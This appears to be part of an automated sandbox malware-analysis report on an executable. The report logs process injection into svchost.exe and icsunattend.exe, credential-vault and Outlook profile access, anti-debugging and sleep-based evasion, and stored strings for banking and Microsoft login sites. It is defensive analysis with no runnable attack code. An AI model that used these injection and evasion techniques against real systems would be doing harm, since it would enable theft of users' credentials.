                Source: unknownProcess created: C:\Users\user\Desktop\VSP469620.exe "C:\Users\user\Desktop\VSP469620.exe"
                Source: C:\Users\user\Desktop\VSP469620.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\VSP469620.exe"
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VSP469620.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\icsunattend.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\icsunattend.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: VSP469620.exe | Static file information: File size 1207808 > 1048576
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: VSP469620.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VgGNmkZfWSSE.exe, 00000006.00000000.1738250337.000000000074E000.00000002.00000001.01000000.00000005.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3141773631.000000000074E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdbGCTL source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdb source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: VSP469620.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: VSP469620.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: VSP469620.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: VSP469620.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: VSP469620.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ACE01E LoadLibraryA,GetProcAddress, 2_2_00ACE01E
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AD6B05 push ecx; ret 2_2_00AD6B18
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ADBDAA push edi; ret 2_2_00ADBDAC
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ADBEC3 push esi; ret 2_2_00ADBEC5
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E88B8F push C4549857h; retf 2_2_00E88B9E
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E88CFF push ds; iretd 2_2_00E88CDB
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E88CB9 push ds; iretd 2_2_00E88CDB
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E88C3D push ds; iretd 2_2_00E88CDB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006DD8AE push ss; ret 4_2_006DD8AF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006D2184 push ds; ret 4_2_006D21DE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E719B push ds; iretd 4_2_006E719C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E8267 push ds; retf 4_2_006E8282
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E42D0 push ds; ret 4_2_006E42D3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006D3290 push eax; ret 4_2_006D3292
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E4BEB push FFFFFFB6h; ret 4_2_006E4BED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006D5B87 push es; iretd 4_2_006D5B88
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E3C24 push edi; retf 4_2_006E3C2C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006F4C23 push ds; ret 4_2_006F4CC6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006FDCC3 push ss; retf 4_2_006FDCF7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006F6D03 push edi; ret 4_2_006F6D0E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E85D5 push edi; iretd 4_2_006E85E4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E66FD push ebp; iretd 4_2_006E6798
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E66D3 push ebp; iretd 4_2_006E6798
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0320225F pushad ; ret 4_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032027FA pushad ; ret 4_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032309AD push ecx; mov dword ptr [esp], ecx 4_2_032309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0320283D push eax; iretd 4_2_03202858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0320135E push eax; iretd 4_2_03201369
                Source: C:\Windows\SysWOW64\icsunattend.exe Code function: 7_2_045127FA pushad ; ret 7_2_045127F9
                Source: C:\Windows\SysWOW64\icsunattend.exe Code function: 7_2_0451225F pushad ; ret 7_2_045127F9
                Source: C:\Windows\SysWOW64\icsunattend.exe Code function: 7_2_0451283D push eax; iretd 7_2_04512858
                Source: C:\Windows\SysWOW64\icsunattend.exe Code function: 7_2_045409AD push ecx; mov dword ptr [esp], ecx 7_2_045409B6
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B18111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00B18111
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ACEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00ACEB42
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AD123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00AD123A
                Source: C:\Users\user\Desktop\VSP469620.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\icsunattend.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\VSP469620.exe API/Special instruction interceptor: Address: E88404
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\icsunattend.exe API/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0327096E rdtsc 4_2_0327096E
                Source: C:\Users\user\Desktop\VSP469620.exe Evaded block: after key decision graph_2-88848
                Source: C:\Users\user\Desktop\VSP469620.exe Evaded block: after key decision graph_2-87940
                Source: C:\Users\user\Desktop\VSP469620.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\icsunattend.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 5972 Thread sleep count: 35 > 30
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 5972 Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe TID: 5936 Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe TID: 5936 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\icsunattend.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AF6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00AF6CA9
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 2_2_00AF60DD
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 2_2_00AF63F9
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00AFEB60
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_00AFF5FA
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AFF56F FindFirstFileW,FindClose, 2_2_00AFF56F
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B01B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00B01B2F
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B01C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00B01C8A
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B01F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00B01F94
                Source: C:\Windows\SysWOW64\icsunattend.exe Code function: 7_2_0036C730 FindFirstFileW,FindNextFileW,FindClose, 7_2_0036C730
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ACDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00ACDDC0
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 2780E4D.7.dr Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: 2780E4D.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 2780E4D.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 2780E4D.7.dr Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 2780E4D.7.dr Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 2780E4D.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 2780E4D.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143171871.0000000000CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 0000000C.00000002.2117384710.00000170A6DDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 2780E4D.7.dr Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 2780E4D.7.dr Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 2780E4D.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 2780E4D.7.dr Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 2780E4D.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 2780E4D.7.dr Binary or memory string: global block list test formVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 2780E4D.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 2780E4D.7.dr Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 2780E4D.7.dr Binary or memory string: discord.comVMware20,11696501413f
                Source: 2780E4D.7.dr Binary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\VSP469620.exe API call chain: ExitProcess graph end node graph_2-87720
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\icsunattend.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0327096E rdtsc 4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_006E7923 LdrLoadDll, 4_2_006E7923
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B06AAF BlockInput, 2_2_00B06AAF
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 2_2_00AB3D19
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AE3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 2_2_00AE3920
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ACE01E LoadLibraryA,GetProcAddress, 2_2_00ACE01E
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E87060 mov eax, dword ptr fs:[00000030h] 2_2_00E87060
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E886D0 mov eax, dword ptr fs:[00000030h] 2_2_00E886D0
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00E88670 mov eax, dword ptr fs:[00000030h] 2_2_00E88670
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03308324 mov eax, dword ptr fs:[00000030h] 4_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03308324 mov ecx, dword ptr fs:[00000030h] 4_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326A30B mov eax, dword ptr fs:[00000030h] 4_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322C310 mov ecx, dword ptr fs:[00000030h] 4_2_0322C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03250310 mov ecx, dword ptr fs:[00000030h] 4_2_03250310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032D437C mov eax, dword ptr fs:[00000030h] 4_2_032D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h] 4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B035C mov eax, dword ptr fs:[00000030h] 4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B035C mov ecx, dword ptr fs:[00000030h] 4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032FA352 mov eax, dword ptr fs:[00000030h] 4_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032D8350 mov ecx, dword ptr fs:[00000030h] 4_2_032D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0330634F mov eax, dword ptr fs:[00000030h] 4_2_0330634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322E388 mov eax, dword ptr fs:[00000030h] 4_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0325438F mov eax, dword ptr fs:[00000030h] 4_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03228397 mov eax, dword ptr fs:[00000030h] 4_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h] 4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032663FF mov eax, dword ptr fs:[00000030h] 4_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032EC3CD mov eax, dword ptr fs:[00000030h] 4_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032383C0 mov eax, dword ptr fs:[00000030h] 4_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DE3DB mov eax, dword ptr fs:[00000030h] 4_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DE3DB mov ecx, dword ptr fs:[00000030h] 4_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032D43D4 mov eax, dword ptr fs:[00000030h] 4_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322823B mov eax, dword ptr fs:[00000030h] 4_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03234260 mov eax, dword ptr fs:[00000030h] 4_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322826B mov eax, dword ptr fs:[00000030h] 4_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h] 4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B8243 mov eax, dword ptr fs:[00000030h] 4_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B8243 mov ecx, dword ptr fs:[00000030h] 4_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0330625D mov eax, dword ptr fs:[00000030h] 4_2_0330625D
